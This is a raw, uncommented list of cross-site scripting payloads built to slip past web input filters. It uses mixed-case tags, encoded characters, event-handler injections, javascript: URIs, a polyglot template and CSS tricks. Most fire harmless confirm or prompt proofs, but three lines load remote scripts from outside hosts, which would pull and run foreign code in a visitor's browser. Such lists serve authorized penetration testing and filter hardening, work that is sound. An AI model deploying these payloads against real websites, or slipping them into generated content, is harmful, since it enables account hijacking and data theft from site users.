<input value=<><iframe/src=javascript:confirm(1)
<input value=<><iframe/src=javascript:console.log(1)
<svg><script>//&NewLine;confirm(1);</script </svg>
<svg%0Aonload=%09((pro\u006dpt))()//
<sCriPt x>(((confirm)))``</scRipt x>
<w="/x="y>"/OndbLcLick=`<`[confir\u006d``]>z
<deTAiLs/open/oNtoGGle=confirm()>
<scRiPt y="><">/*<sCRipt* */prompt()</script
<A href="javascript%26colon;confirm()">click
<sVg oNloaD=write()>
<sCrIpt/"<a"/srC=data:=".<a,[8].some(confirm)>
<svG/x=">"/oNloaD=confirm()//
<--`<iMG/srC=` onerror=confirm``> --!>
<SVg </onlOad ="1> (_=prompt,_(1)) "">
<!--><scRipT src=//14.rs>
<sCriPt/src=//14.rs?
<sCRIpt x=">" src=//15.rs></script>
<D3/OnMouSEenTer=[2].find(confirm)>z
<D3"<"/OncLick="1>[confirm``]"<">z
<D3/OnpOinTeReENter=confirm``>click here
<!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>
<svg><script>//&NewLine;confirm(1);</script </svg>
'''"'-function(){{{callback}}}()-">\"><scrIpt>{callback}</scrIpt><aUdio src=x oNerror={callback}><"-'-function(){{{callback}}}()"'''
";a=prompt,a()//
"><img src=x onerror=prompt(1);>
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
exp/*<XSS STYLE='no\xss:noxss("*//*");
<x style="background:url('x&#1;;color:red;/*')">XXX</x>
<x style="behavior:url(%(sct)s)">
<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a
<a id="x"><rect fill="white" width="1000" height="1000"/></a>
javascript:confirm(1)
javascript\x0A:javascript:confirm(1)
\x1Cjavascript:javascript:confirm(1)
\xE2\x81\x9Fjavascript:javascript:confirm(1)
\xE2\x80\x85javascript:javascript:confirm(1)
